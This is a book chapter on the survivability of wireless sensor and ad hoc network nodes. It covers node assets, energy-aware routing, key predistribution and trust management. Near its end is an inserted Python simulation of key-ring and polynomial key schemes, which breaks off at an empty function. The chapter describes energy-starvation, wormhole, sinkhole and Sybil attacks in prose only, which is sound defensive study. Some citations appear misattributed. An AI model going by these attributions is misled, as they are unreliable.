Weiser (1991) envisioned ubiquitous computing with computing and communicating entities woven into the fabric of everyday life. This chapter deals with the survivability of ambient resource-constrained wireless computing nodes, from fixed sensor network nodes to small devices carried by mobile entities, for example, as part of a personal area network of a moving person. First, we review the assets that need to be protected, especially the energy of these unplugged devices. A number of specific attacks are also described, for example, direct physical attacks, which are facilitated by the absence of a physical security perimeter. Finally, we survey the protection mechanisms that have been proposed, with an emphasis on cryptographic keying material and trust management.

INTRODUCTION

Weiser (1991) envisioned a ubiquitous computing world where intelligent computing and communicating devices are pervasive and woven into the fabric of everyday artifacts. His vision is being materialised: the market of large scale sensor and hand-held device networks has been gaining momentum. However, one may question whether or not these computing and communicating entities will be able to survive in an open environment. These computing entities are no longer protected by a physical security perimeter; foreign, potentially malicious, entities can tamper with them. Another challenge for the real deployment of these networks of sensors and portable devices is to provide them

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Survivability of Sensors with Key and Trust Management

with enough energy for long term functioning because it is assumed that they are unplugged from the mains electrical power supply and can rarely recharge themselves by this means. Any action carried out by these entities depletes their energy. In addition to being resource-constrained in terms of energy, these entities are resource-constrained in terms of memory and processing, which limits what they can do, especially when these entities are small, such as the sensors deployed in sensor networks.

Usually, sensors perform two important types of actions or tasks: they have to sense the environment and to send information out to a specific target entity, sometimes called the sink. For example, the sink may be an Internet gateway that will propagate the information for persistent storage and analysis. Security problems exist both when messages are generated and when they are relayed. Working most of the time in an unattended environment without tamper-proof hardware makes the sensors very vulnerable to attacks.

Generally, mobile ad hoc networks (MANETs) are thought to be composed of nodes bigger than the sensors of sensor networks. Also, whereas sensors are considered fixed (after their deployment) as far as their location is concerned, MANETs imply that the nodes move. If we assume that the MANET nodes are also unplugged from the mains power supply, the nodes also have limited energy. Another difference between sensors and MANET nodes is that instead of just having to sense and forward simple information, MANET nodes are expected to run much more complicated operations that surely require more energy than simple tasks. In this chapter, we consider all ad hoc networks where the wireless nodes are resource-constrained, especially in terms of energy. Thus, as introduced above, the nodes may range from the tiny fixed deployed sensor to the mobile unplugged device.

In this chapter, we first survey the different assets of these entities and then delve into specific attacks on these assets. We then present two main protection mechanisms: cryptographic keying material and evidence-based trust management. Finally, we discuss future trends and draw our conclusion.

BACKGROUND ASPECTS OF NODES SURVIVABILITY

In this section, we first discuss what we mean by nodes survivability, their assets, and especially their energy. Then, we focus on the routing asset, which is an important asset that enables the nodes to communicate beyond their own wireless communication range. It shows that routing was initially engineered without attackers in mind, which is also the case for most of the other enabling mechanisms and assets. However, there are a number of attacks that can be carried out on these assets. We survey them at the end of the section.

Node(s) Survivability

First, it is important to note that we use the plural in the heading of this section, nodes survivability, because it emphasises that the scope of the node's mission may span more than one node. On one hand, it may be a scenario where the survivability of the node itself is more important than the survivability of the other nodes. For example, a user who carries a mobile phone in the mountains may be selfish and would not bother forwarding the messages of other users met on the way to the top of the mountain. The forwarding of a message from another user would deplete the energy of the mobile phone and endanger the survivability of the device and its mission lifetime. On the other hand, the mission may be that the majority of the nodes survive at the expense of the survival of one specific node. It is usually the case in sensor networks where the goal is to sense and monitor a region thanks to the collaboration of many nodes. If a part of the monitored region is quite active, it is possible that the nodes in this active region take over the work of another node, for example, to forward the sensed information in order to maximise the lifetime of the monitoring of the whole region. That type of scenario requires that there is some sort of control on the nodes; an authority is needed to guarantee that the nodes will collaborate and follow the rules. For example, in a military environment, the nodes that are deployed



are configured before the deployment and we can assume that they will all follow the rules (until they are captured or they fail). A military environment is said to be a controlled environment, its extreme being an open environment where every node is free to behave as it wishes. In the middle of these extremes, there are scenarios where a selfish node may increase its lifetime by sporadically helping other nodes: the nodes being interdependent.

The Assets Underlying the Survivability

As explained in the previous subsection, the first type of asset underlying the survivability is the survivability of the node or the survivability of the network of nodes. In interdependent settings, the neighbouring nodes are an asset that enables the node to achieve more than what it could achieve alone. An underlying asset is the trustworthiness of these neighbouring nodes. The node may be able to choose or influence which nodes are its neighbours, for example, by moving to another location or by mere selection (the third section explains how evidence-based trust management can be used to optimise the selection process). In sensor networks, it is less often assumed that new nodes can be added after the initial deployment of the nodes. Sensors are mainly used to monitor the characteristics of a specific fixed area or targets. However, in MANET scenarios, when the nodes correspond to devices carried by people, it is clear that the nodes can come and go as the people roam from place to place. If the adjunct nodes and their location can be chosen, the survivability of the network of nodes may be prolonged. All the nodes may participate in the survivability of the network of nodes. Therefore, the nodes' participation can be considered as an asset.

Another asset for a node is to be highly tamper-proof. However, as said above, nodes in open environments can be captured and highly tamper-proof hardware may be too costly. An asset may be the possibility to communicate the evidence of tampering, for example, an alert being sent at the time of capture or creating some form of tamper-evidence.

Besides being captured by an adversary and removed from the network, the lifetime of the node and its mission mainly depends on its consumption of energy. The design of the node is an inherent asset of the node because both hardware and software designs may end up consuming more or less energy.

Current sensor nodes are battery-powered devices. The energy consumption of a sensor is due to the computation and the communication modules. Energy is depleted mainly by the communication module. Radio transmission consumes most of the energy spent on security mechanisms, and encryption only consumes 3% (Hwang, Lai, & Verbauwhede, 2004). Thus, minimising security-related transmissions is important with regard to energy saving. However, sensors are constrained devices and the security mechanisms available for conventional networks are not suitable due to their limited computational, memory, and energy resources. They are often deployed in hostile environments with no physical access to nodes after deployment. Thus, the sensor lifetime is limited by the initial energy of the battery. Different energy harvesting mechanisms are being researched for sensors, such as the use of solar cells, but they are still not very common. Users' mobile computing devices like personal digital assistants and mobile phones are also battery-powered but they can be more easily recharged.

While energy recharging and harvesting mechanisms are put in place, the nodes need energy saving mechanisms. Usually, energy saving mechanisms are based on the difference in energy consumption between the active and the idle states. Energy is saved by minimising the fraction of time during which the device is active. These energy saving mechanisms normally target the subsystem of the device that has the greatest difference between the energy consumption of the two states. Once no application is running on the device, it is put into a low power state, extending the battery life. A sensor node can usually be in four different states: transmit, receive, idle, and sleep. The sleep state consumes significantly less energy than the other states. Preserving network longevity is one of the main issues in sensor networks. The topology of the network is not known a priori because the nodes are randomly



scattered over a target area. Sensor networks are often dense networks. Not all the nodes are necessary to accomplish a specific request. One method to save energy is to put nodes to sleep in a manner that does not interfere with the functionality of the network. In a sensor network the lifetime of the network is more important than each sensor. Thus, the protocols developed for sensor networks consider the optimisation of network lifetime. The topology of the network may be dynamic. Nodes may become temporarily inactive to save their energy or they drain their battery. At the same time, new nodes may be deployed in the same area. Energy is limited in the network. However, the nodes may have to repeatedly communicate with a base station on a hop-by-hop basis. To minimise the energy spent in the network, energy-preserving secure routing protocols (surveyed in the following subsection) have been developed. The communication patterns are concerned with balancing energy consumption and preserving network lifetime and purpose. Usually, the whole region needs to be covered by the nodes. The purpose of the network requires that the sensing coverage works for all locations. At any location, the nodes should be able to send the collected data to the base station. Energy saving should not deteriorate the connectivity and the coverage of the network. An energy optimisation scheme should also maintain the initial coverage. Energy efficient schemes group sensors in different sets that are alternately active (Cardei, 2005; Ramchurn, Jennings, Sierra, & Godo, 2004).

Another solution is to enforce clustering algorithms (Handy, 1995). An example of energy management at the node level occurs with a cluster-based sensor network topology. In this case, energy efficient routing protocols use hierarchical structures like clusters among the nodes forming the network. The nodes in the cluster only communicate with the cluster head. The cluster head is the only one to communicate with the other cluster heads and provides aggregation of data for the nodes forming the cluster.

The nodes that are not cluster heads may receive the information later. The responsiveness of the node, concerning computation and communication, is also important. In addition to consuming more energy, the use of security mechanisms may also require more storage space, for example, for the keying material, and may slow down the processes due to the additional security steps, such as encryption, decryption, and signatures.

Besides the above special assets, there are also more basic security assets, namely, the confidentiality/privacy, integrity, and availability properties of each node and their messages. When these basic assets are compromised, the other assets may be more easily compromised.

The list below summarises the different assets that we have discussed in this section:

• Node-level assets:
  ° Node mission lifetime:
    - Node energy
      • Harvesting source
      • States and actions management
    - Node tamper-proofness and tamper-evidence
  ° Node localisation
  ° Node mobility (in case of non-fixed settings)
  ° Node computing performance
  ° Node neighbours' presence in interdependent settings
  ° Node communication:
    - Ability
      • Reception
      • Transmission
      • Coverage range
    - Confidentiality
    - Integrity
    - Speed
• Network of nodes-level assets:
  ° Network mission lifetime
  ° Deployment of new nodes
  ° Nodes' participation and trustworthiness
  ° Network connectivity, performance and coverage

The Routing Asset Case-Study

The nodes can use their wireless link to directly communicate with the other nodes in range. Sometimes the nodes can increase their transmission



energy to reach farther nodes. However, as said above, communication tasks use a lot of energy; for example, if we assume Friis' (1946) free-space attenuation, the energy needed for wireless transmission over a distance d is proportional to d². Thus, the nodes may save energy by using other, closer nodes to forward their message to farther nodes. In addition, if the nodes cannot increase their transmission energy to reach a specific far-away node, the only remaining solution is to use intermediate nodes to forward the message. This is why routing algorithms have been researched. In this subsection, we survey the most well-known protocols that allow the nodes to exchange messages. We start with the MANET protocols and then the protocols said to be specific to sensor networks, which are explicitly energy-aware.

MANET Routing Protocols

Maltz (2001) depicts the history of MANETs. The first significant project towards MANETs was the DARPA-sponsored military packet radio network (PRNET) in 1972. Now, MANETs seem to be used on battlefields. The goal of researchers like Maltz was to outperform the military protocols. They reached efficient and good performance for routing in MANETs with ad hoc on-demand distance vector routing (AODV) (Perkins & Royer, 1999) or dynamic source routing (DSR) (Maltz, 2001).

Both AODV and DSR are reactive routing protocols because they compute the route between two nodes only when the route is needed, that is, 'on demand.' In doing so, there are far fewer tasks to be carried out because all the routes do not have to be maintained all the time. It is very important from an energy point-of-view in mobile settings where the nodes come and go very quickly and where the routing information would need to be updated very often. However, neither AODV nor DSR integrates further specific mechanisms to minimise the energy consumption along the route.

Another limitation comes from the fact that Maltz and colleagues designed their protocols with the same assumption as for military MANETs. In military MANETs, it is often assumed that the deployed nodes are controlled; it is a controlled environment where it is understandably supposed that nodes are not free to do whatever they can do. In open MANETs, where any user's node can come and go depending on the user's will, the nodes might not follow the rules and they challenge the correct functioning of these routing protocols. Thus, the researchers had to revise their protocol approach (not to say restart from scratch) because all was working well under the assumption that the nodes do collaborate, but in open MANETs, where nodes are owned by free people, assuming that everyone collaborates is simply not realistic. In 2001, the conclusion was that security in MANETs is particularly difficult due to their specificities (Hubaux, Buttyán, & Capkun, 2001): vulnerability of channels and nodes (i.e., less physical security); resource-constrained nodes; high probability of absence of infrastructure; and dynamically changing topologies and high uncertainty. An interesting issue is the question of collaboration, which is vital for some MANETs to stay up: the nodes are neither dependent nor independent but interdependent. If too many nodes are too selfish, the overall availability is endangered (Miranda & Rodrigues, 2003).

Sensors Network Protocols

As mentioned above, in sensor networks, the deployed nodes are usually supposed to collaborate. However, due to their small size and the assumption that they can never be recharged, the MANET protocols are not sufficient to optimise the use of the energy of the nodes. This is why other researchers have researched new routing protocols with an emphasis on energy consumption optimisation. Energy-aware routing protocols explicitly take into account the energy consumption as a parameter. This subsection surveys seven of these new protocols that use one or several of the following basic techniques:

• Keeping short range transmissions
• Aggregating data
• Building efficient paths


• Switching between sleep/awake states
• Efficiently controlling multi-paths

During the set-up phase of the minimum cost forwarding algorithm (MCFA) (Ye, Chen, Liu, & Zhang, 2001), each node initialises its least cost to the sink to an infinite value. The sink broadcasts a setup message to its neighbours. Each of the neighbours computes and updates its least cost estimate to the sink and eventually broadcasts further to its own neighbours. When receiving a broadcast message, a node computes its new least-cost estimate. If it is lower than the current least cost estimate, the node updates it and broadcasts its new estimated least cost to its neighbours, and so on. In order to avoid collisions as well as the duplication of unnecessary messages, that is, in order to optimise the flooding involved, MCFA introduces a back-off mechanism, which is basically a timeout before propagating the updated values of the estimated least cost. During the propagation phase, when a node needs to send a message to the sink, it broadcasts it to its neighbours. When a node receives a message, it checks if it is on the least cost path, and if so, propagates the message further. Otherwise it just drops the message.

Gradient-based routing (GBR) (Schurgers & Srivastava, 2001) is somewhat similar to MCFA. It proposes to slide messages along a gradient towards the sink. GBR is a general scheme; it proposes a few gradients but it is open to other possible gradients. The gradient can be computed similarly as in MCFA, that is, using the back-off mechanism. If one wants to introduce the hop-count in the gradient, the hop-count is included in the gradient formula.

MIX (Powell, Jarry, Leone, & Rolim, 2006) is a variant of GBR that allows a node to eject a message directly to the sink in case of high remaining energy on the current node compared to the energy remaining on its neighbours. In MIX, a sensor can choose to eject a message when all its short-range neighbours have lower energy than itself. To eject means that the sensor increases its transmission power to be able to reach the base station in one transmission. As said above, the energy spent increases a lot, nonlinearly, with the distance. The ejection feature of MIX can be seen as a dynamic clustering technique: the ejecting nodes are cluster heads and the cluster members are nodes which propagate towards the ejectors. The cluster heads (and thus the clusters) are automatically updated by the distributed algorithm.

The low-energy adaptive clustering hierarchy (LEACH) (Handy, 1995) is a more well-known distributed randomised cluster formation algorithm. Many more complicated and optimised algorithms that exist in the literature have been inspired by LEACH. LEACH is based on partitioning the network into clusters. It features two distinct phases:

1. Cluster formation: Cluster heads are self-elected according to a very simple random rule: each node decides to become a cluster head with probability p, where p depends on a threshold value. This threshold function depends on parameters such as the remaining energy, the time elapsed since the network started, and the number of times the node has been a cluster head before. Thus, energy balancing is possible through the fine-tuning of the parameters. Once self-elected, the cluster heads advertise themselves to non-cluster heads by broadcasting an announcement message. Non-cluster head nodes then decide to which cluster they will attach themselves. Basically, they attach themselves to the closest cluster head, although closest could have different meanings. Once the cluster head is aware of all of its cluster members, it computes a time division multiple access (TDMA) schedule and ass
igns a time slot to each of the members of the cluster. The cluster members are only allowed to transmit data to the cluster head during the time slot that they have been assigned. Hence, no message collision occurs.

2. Data propagation phase (once the clusters have been formed): Data are sent by the cluster members directly to their cluster head. The cluster head then aggregates the data before sending them directly to the sink. Other protocols inspired by LEACH propose to run a more sophisticated algorithm than



direct transmission to the sink by using another routing protocol on a subgraph of the communication graph, sometimes called a 'backbone network,' where the nodes are typically the cluster heads. The distributed cluster formation phase has to be rerun from time to time in order to avoid early energy depletion of the cluster heads.

The directed diffusion (DD) (Intanagonwiwat, Govindan, Estrin, Heidemann, & Silva, 2003) protocol is also very famous but a bit more complicated than LEACH. It works roughly in the following way. The sink(s) send interests (consisting of attribute-value pairs), which are flooded across the network. The sources are discovered as the nodes capable of satisfying the interests. In a second stage, the gradients are set (the exact way in which gradients are set is application specific). Different gradients permit building routes between the sources and the sink with different properties, for example, high robustness, low latency, low energy cost, and so forth. Information is propagated along the paths following the gradients. Energy can be further spared by carrying out in-network data aggregation as well as using caching techniques. DD seems to be very suitable for the so-called continuous monitoring application domain (as opposed to event-driven monitoring), because there is a cost in establishing the routes (or interest gradients, more precisely), and once they have been established they should be used for some time, that is, continuously.

In the sensor protocols for information via negotiation (SPIN) (Kulik, Heinzelman, & Balakrishnan, 2002), data are disseminated throughout the network, assuming that each sensor node is a potential sink. This is particularly efficient in the case of mobile networks. The protocol works in the following way. When a node detects an event, it sends an ADV message advertising the detected event. The nodes receiving the ADV decide if they are interested in the information, and if so, send a request (REQ) message, following which the actual data will be sent. The idea is to avoid unnecessary flooding of long data messages in the network when the information is redundant. The nodes decide to send REQ messages by analysing the ADV message, which is assumed to contain the necessary information to take this decision. The actual encoding of the ADV message is application specific and not specified by the SPIN protocol. Variants of SPIN offer different optimisations for different contexts. For example, nodes can decide to stop participating when they believe that they do not have enough energy to complete all stages of the protocol.

The final protocol that we survey is probabilistic forwarding (PFR) (Chatzigiannakis, Dimitriou, Nikoletseas, & Spirakis, 2006). It uses the following approach, which is common in routing protocols. In order to ensure robustness (against link failure, message collision, etc.), data are propagated in a multipath way. However, the total number of paths has to be controlled. In PFR, it is assumed (although this assumption can be relaxed) that the angle of reception as well as the direction to the destination of a message can be computed. For example, this assumption holds in a localised network. Using this information and by piggy-backing/adding O(1) bits of information to the message, the nodes can probabilistically decide to forward or drop the message. The messages are propagated along a multipath beam whose width can be controlled by a parameter of the algorithm. Being able to control the width of the beam enables the control of the energy cost overhead implied by multipath routing, and having a multipath beam ensures robustness to link failure.

In the next subsection, we cover a specific form of failure, namely, failure due to malicious activities, also known as attacks.

Survey of the Attacks on the Nodes Assets

Above, we have surveyed the protocols that have been proposed for routing. These protocols are more or less energy-aware. However, most of the time these protocols assume that there is no attacker. As we are moving to a ubiquitous computing world, assuming that there is no attacker is unrealistic because the nodes are deployed in open environments where anybody can deploy nodes or try to tamper



with any nodes. We consider the cost of a physical attack as low because the nodes are assumed not to have significant tamper resistance, due to the cost of such protection for devices that are supposed to be affordable for large scale deployment (Pirretti, Zhu, Narayanan, McDaniel, Kandemir, & Brooks, 2005). In a node capture/tampering attack, an adversary has physical access to the node. Current security solutions are evaluated by taking into account the resistance of the network to node capture, that is, the number of nodes that need to be captured in order to corrupt the entire network. Time is the factor used to evaluate the attacks that are in progress.

Another type of attack may especially target the energy asset. That form of attack is usually called the energy starvation attack. For example, Martin, Hsiao, Ha, and Krishnaswami (2004) depict a denial-of-service attack targeting battery powered devices. Its purpose is to drain the battery of the device, for example, by obliging the nodes to consume more energy than necessary. In the case of mobile computing devices, the attack leads to an inoperable device. It may only be temporary for a mobile device but it is usually not the case in sensor networks where the nodes cannot be recharged. In addition, the inoperability of several sensors can disrupt the functionality of an entire network region. An energy starvation attack may prevent the device from entering its low power state, thus increasing the time during which the device is active. This attack can be carried out when energy saving schemes are used. As said above, an energy saving scheme schedules an awake/sleep cycle for each node. In a sleep deprivation attack a node is forced to remain in the awake state. We start with two types of energy starvation attacks. The first type is the sleep deprivation attack, which targets the communication subsystem and prevents the sleep state. The second type, called the barrage attack, is carried out by demanding energy intensive operations: a node receives successive task requests.

Another possibility of increasing the energy consumption is to increase the energy needed for executing a task. The measure of the success of the attack may be the increase in overall energy consumption. The attack may be detected by the owner because the battery is expected to have a certain lifetime. Ultimately, the measure of this attack may be the ratio between the real and the expected lifetime of the battery. It has been reported that for mobile devices this ratio may be from one to two orders of magnitude (Pirretti et al., 2005). Martin et al. (2004) identify three types of sleep deprivation attacks on mobile devices. In a service request power attack, a device must repeatedly execute a network service for a remote entity. Even if the service is not available, the process of authentication consumes time and energy. Another type of power attack may be to request the devices to repeatedly execute an energy-hungry task. On mobile devices, power attacks may be detected by scanning software that compares the current energy consumption to the normal energy consumption. On small sensors, it may be infeasible to run such scanning software. Other solutions analyse the energy consumption pattern because power attacks modify the energy consumption signature of the applications. Another solution may be to define and impose an energy limit for an application or a task.

The nodes executing important tasks, like cluster heads, are perfect targets from which to initiate stronger attacks on the other nodes in the cluster. These attacks are prevented by preventing the misbehaving nodes from becoming a cluster head. The solution evaluated by Pirretti et al. (2005) as the best to prevent this type of attack is a hash-based cluster head selection. The cluster head does not decide itself to be the next cluster head, but it is selected by a random vote of the neighbours. This attack can be categorised as a topologically-inspired attack (Seigneur, 2005), where the knowledge of the topology of the network of nodes is used to carry out more harmful attacks. This knowledge can be extracted by standard attacks that are also possible in our settings.

The messages sent by the nodes can be captured and read by attackers, which constitutes a confidentiality attack. A confidentiality attack may also be carried out to infer message provenance, route analysis, and activity monitoring. In some sensor network scenarios, it is crucial that the location of



the nodes that sensed the information is not known. For example, sensor networks have been deployed to monitor the location of pandas in their natural habitat (Ozturk, Zhang, & Trappe, 2004). Due to the presence of hunters, source-location privacy is crucial. If we extend the scenario to the location of people, we can really talk of source-location privacy attacks. The network topology can be inferred from this information. More knowledge can help the attacker to carry out more harmful attacks targeting specific active/low-energy zones or traffic control. Among the other standard attacks, there are also the attacks that target the integrity of the messages as well as of the traffic or specific zones. The messages may be changed, replayed, delayed, or even destroyed.

As said above, the routing protocols work well when all nodes cooperate. However, in real settings, the cooperation assumption may not be valid. If the nodes are small, low-power devices, they are limited in energy and may be motivated to have a selfish, noncooperative behaviour when it comes to relaying the messages from other nodes. They can save power by not forwarding the messages received from the neighbours. Furthermore, selfishness is not the only misbehaviour that has to be addressed. An attacker can compromise nodes and then prevent packets from reaching their destination. For example, in MIX, a few neighbour nodes may lie about their current energy level to avoid having to forward messages, or worse, they may not forward messages when asked to do so. In the latter case, these misbehaving nodes carry out an attack commonly called a sink hole attack (Pirzada & McDonald, 2005). A sensor behaving like a sink hole will drop any packet it receives. In a worm hole attack (Hu, Perrig, & Johnson, 2002), two colluding sensors create a tunnel between them. The first node may be situated in the proximity of the base station and replays the messages received by the second one. The tunnel is a fast path and will encourage the nodes to use it for routing. This attack is hard to detect because the authenticity and confidentiality security requirements are maintained. Once the packets are routed through the wormhole, denial-of-service attacks can be enforced. Packets will be forwarded selectively or they will not be forwarded at all. In a Sybil attack (Douceur, 2002), a node uses multiple identities without revealing that it owns these different identities. If some mechanisms in the network use the majority of votes in their decision making, a node with many identities can cheat during the voting process by using more than one vote. For a routing protocol that uses several paths to the destination, a Sybil attack can advertise one path as several ones. Additionally, a Sybil attack can be correlated with sink hole or worm hole attacks.

PROTECTION MECHANISMS

Different protection mechanisms have been proposed to increase the survivability of the nodes and protect their assets. For example, a few of the routing protocols surveyed above have recently been patched with security mechanisms: secure-SPIN (Xiao, Wei, & Zhou, 2006) adds cryptographic functions to SPIN that do not require too much memory and processing power; and secure directed diffusion (SDD) (Wang, Yang, & Chen, 2005) uses an efficient one-way chain rather than asymmetric cryptography, which is too complex for the resource-constrained nodes, to increase the security of the protocol. Indeed, the cost of the protection mechanisms really has to be taken into account due to the resource constraints of the nodes. Cryptographic solutions may be used for confidentiality and integrity of data but they may be too heavy in some settings. Any protection mechanism needs to be analysed with regard to its computation cost, its memory cost, its communication cost, and its energy cost (Hwang et al., 2004). In the next subsections, we detail two fast-evolving protection mechanisms: cryptographic key deployment and management among the nodes, and computational trust management.

Key Deployment and Management

A first line of defence is the use of cryptography to encrypt the communication between the nodes. However, this requires the distribution/deployment of secrets in the nodes to allow them to encrypt the


communication with this secret. The distribution of keys is usually followed by a shared key discovery phase and a path key establishment phase. Other elements that need to be considered are key revocation, rekeying, and addition of nodes. Two neighbour nodes can communicate only if they share the same key. Network resilience is defined as the number of captured nodes before an attacker is able to control the network. Network connectivity is defined as the probability that two nodes can communicate. Rekeying overhead is defined as the network traffic needed to establish a new key. Both network resilience to node capture and pair-wise connectivity depend on the size of the keying material stored on the nodes. While public key cryptography is not feasible due to limited computational resources, the distribution of secret keys to each sensor is assumed to be feasible in the literature. As we underlined above, the nodes are low cost devices without strong tamper proof hardware. Thus, a captured node will, at some stage, permit access to its cryptographic material. Key management schemes (Chan, Perrig, & Song, 2003; Mohammed & Mohamed, 2005) try to increase network resilience to node capture while maintaining the performance goals and minimising the resulting cost of lower network connectivity due to sensors that do not share similar secret keys. There is a trade-off between the energy spent, the cost of the memory used for protection, and the security level reached (Hwang et al., 2004).

Static keying means that the nodes have been allocated keys off-line before deployment, that is, predeployment. The existing solutions assign keys either randomly or based on deployment information, for example, the predicted neighbourhood of the nodes. A basic scheme is to generate p keys off-line and to allocate to each node k keys chosen randomly among these p keys. After deployment, a node broadcasts a set of identifiers of its known keys and can communicate with the nodes that have at least one common key. The advantage of static keying is no communication overhead after the deployment. The easiest way to secure a network is to give a unique key at predeployment time. However, in this case, if only one node is compromised the whole network is compromised, and it seems viable to extract the key from one node as they are cheap and not so well protected (at least in nonmilitary application scenarios). The second approach is to have pairwise keys for all sensors on each sensor, which is impractical due to the memory constraints of the sensors. Saurabh and Mani (2004) argue that previous approaches relying on key management and cryptographic means are not suitable for small nodes, such as sensors, due to their resource constraints or the fact that it is easy to recover their cryptographic material because they are cheap and not fully tamper-proof. For n nodes deployed in the network, each node would have to store n-1 keys. Even if the keys are small (e.g., 64 bits), for a network of tens of thousands of nodes the storage space required for the keys is impractical. It is worth noting that only a small fraction of the keys may be used in fixed standard sensor networks because the density of the network may be low and a sensor may only be able to communicate with few neighbouring nodes with direct communication. Eschenauer and Gligor (2002) mitigate the memory constraints problem whilst keeping the key resilience level at a target threshold level. If we consider N the number of nodes in the network and p the probability that two nodes share a common key, then each node will store a set of Np keys, called a key ring. The keys are selected from a larger key pool. Each node stores a set of keys and an identifier for each key. A shared key discovery phase between the neighbours is necessary after the deployment. Each node broadcasts the identifiers of the keys in its key ring. If the nodes share a common key, there is a link between them. If a common key between two nodes does not exist, then a path key establishment procedure takes place. An alternative is to use location information to improve connectivity. Polynomial-based key predistribution schemes (Chan et al., 2003) use a random symmetric t-degree polynomial P. A polynomial share is defined as a partially evaluated polynomial: P(i,y) or P(y,i). Based on the polynomial share, each node can compute a common key: f(i,j). The scheme is resistant to t collusions.

Dynamic keying means that the keys can be (re)generated after deployment. New keys are created in order to prevent a potential attacker from using the keying information obtained by node capture. It creates more communication overhead but stronger resilience to node capture. Dynamic key management schemes are based on the exclusion basis systems (EBS) (Mohammed & Mohamed, 2005). There is an initial pool of k+m keys. Each node stores k keys. Rekeying is carried out from time to time because there is the assumption that some nodes are captured from time to time. The m keys that are unknown to the captured nodes are used to encrypt replacement keys that are distributed to the safe nodes. However, since m is usually chosen quite small to limit the number of messages needed for rekeying, a few nodes may be enough to collude and unveil the keys of the whole network. To mitigate this issue, Mohammed and Mohamed (2005) propose a variant based on key polynomials instead of basic keys. Each node stores k polynomials of t-degree out of a k+m pool of polynomials. In order to obtain a key, t+1 shares of each polynomial are needed. Another approach to mitigate the attacks of colluding nodes may be to evaluate the trust that can be placed in the involved nodes.

Computational Trust Management

In the human world, trust exists between two interacting entities and is very useful when there is uncertainty in the result of the interaction. The requested entity uses the level of trust in the requesting entity as a means to cope with uncertainty and to engage in an action with potential benefits in spite of the risk of a harmful outcome. In our settings, the nodes may be interdependent, for example, to reach far away nodes via routing and forwarding between intermediate nodes. We have seen above that it is an asset for the nodes to have trustworthy neighbours, and computational trust is a means to compute trust in them. There are many definitions of the notion of human trust in a wide range of domains with different approaches and methodologies (McKnight & Chervany, 2000), such as sociology, psychology, economics, pedagogy, and so forth. Romano's (2003) recent definition tries to encompass the previous work in all these domains.

Trust is a subjective assessment of another's influence in terms of the extent of one's perceptions about the quality and significance of another's impact over one's outcomes in a given situation, such that one's expectation of, openness to, and inclination toward such influence provide a sense of control over the potential outcomes of the situation.

A computed trust value in an entity may be seen as the digital representation of the trustworthiness or level of trust in the entity under consideration; a nonenforceable estimate of the entity's future behaviour in a given context based on evidence (Trustcomp, n.d.). A computational model of trust based on social research was first proposed by Marsh (1994). Trust in a given situation is called the trust context. Each trust context is assigned an importance value in the range [0,1] and a utility value in the range [-1,1]. Any trust value is in the range [-1,1). Risk is used in a threshold for trusting decision making. Evidence encompasses outcome observations, recommendations, and reputation. The propagation of trust in peer-to-peer networks has been studied by Despotovic and Aberer (2004), who introduce a more efficient algorithm to propagate trust and recommendations in terms of computational and communication overhead. Such overhead is especially important in networks of nodes as any communication overhead requires more energy spending.

A high level view of a trust engine is depicted in Figure 1. The decision-making component can be called whenever a trusting decision has to be made. Most related work has focused on trust decision making when a requested entity has to decide what action should be taken due to a request made by another entity, the requesting entity. It is the reason that a specific module called entity recognition (ER) (Seigneur, 2005) is represented to recognise any entities and to deal with the requests from virtual identities. In our network of nodes settings, when keying material is used, the nodes may be recognised via the secret keys that they own and use.
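Since recognition here rests on the keying material, the static keying schemes surveyed in the Key Deployment and Management subsection above are worth seeing in working form. The following is an added example, not code from the chapter or from the cited authors: it simulates a random key pool with key rings and shared-key discovery, measures connectivity and the fraction of links exposed by node capture (the resilience notion defined above), and derives pairwise keys from polynomial shares. Function names, parameters and the choice of the lowest-numbered shared key as link key are this example's own assumptions.

```python
"""Added example, not from the chapter: static keying schemes on constructed data.
1. Random key predistribution (Eschenauer & Gligor, 2002, as summarised above):
   key pool, key rings, shared-key discovery by exchanging key identifiers, and
   the fraction of links an attacker can read after capturing some nodes.
2. Polynomial shares (Chan et al., 2003, as summarised above): a random symmetric
   t-degree bivariate polynomial over a prime field; node i holds the share
   P(i, y) and derives f(i, j) = P(i, j) with any node j.
Function names, parameters and the link-key choice are this example's own."""
import random
from itertools import combinations
from math import comb

# --- 1. Random key predistribution -------------------------------------------

def make_key_rings(num_nodes, pool_size, ring_size, rng):
    """Predeployment: each node gets ring_size distinct key identifiers drawn
    at random from a pool of pool_size keys (keys are indexed by identifier)."""
    return [frozenset(rng.sample(range(pool_size), ring_size))
            for _ in range(num_nodes)]

def shared_key_discovery(rings):
    """After deployment each node broadcasts its key identifiers, not the keys.
    Two nodes get a link iff their rings intersect; the link key is the
    lowest-numbered shared key (a constructed, deterministic choice)."""
    links = {}
    for a, b in combinations(range(len(rings)), 2):
        common = rings[a] & rings[b]
        if common:
            links[(a, b)] = min(common)
    return links

def share_probability(pool_size, ring_size):
    """Probability p that two random rings share at least one key:
    1 - C(P - k, k) / C(P, k) for pool size P and ring size k."""
    return 1 - comb(pool_size - ring_size, ring_size) / comb(pool_size, ring_size)

def connectivity(rings, links):
    """Measured network connectivity: fraction of node pairs that share a key."""
    pairs = comb(len(rings), 2)
    return len(links) / pairs if pairs else 0.0

def compromised_fraction(rings, links, captured):
    """Resilience to node capture: an attacker who extracted the rings of the
    `captured` nodes knows the union of their keys. Returns the fraction of
    links between uncaptured nodes whose link key is in that union."""
    known = frozenset().union(*(rings[c] for c in captured))
    remaining = [key for (a, b), key in links.items()
                 if a not in captured and b not in captured]
    if not remaining:
        return 0.0
    return sum(key in known for key in remaining) / len(remaining)

# --- 2. Polynomial-share key predistribution ----------------------------------

PRIME = 2**61 - 1  # constructed field modulus; sized for the key length wanted

def random_symmetric_polynomial(t, rng):
    """Coefficients a[i][j] = a[j][i] of P(x, y) = sum a[i][j] x^i y^j, degree t."""
    a = [[0] * (t + 1) for _ in range(t + 1)]
    for i in range(t + 1):
        for j in range(i, t + 1):
            a[i][j] = a[j][i] = rng.randrange(PRIME)
    return a

def polynomial_share(a, node_id):
    """Share for node i: the univariate polynomial P(i, y) as coefficients of y^j."""
    t = len(a) - 1
    return [sum(a[i][j] * pow(node_id, i, PRIME) for i in range(t + 1)) % PRIME
            for j in range(t + 1)]

def pairwise_key(share, other_id):
    """f(i, j) = P(i, j): node i evaluates its share at y = j. Symmetry of P
    gives P(i, j) = P(j, i), so node j derives the same key from its share."""
    return sum(c * pow(other_id, j, PRIME) for j, c in enumerate(share)) % PRIME

def demo(seed=1):
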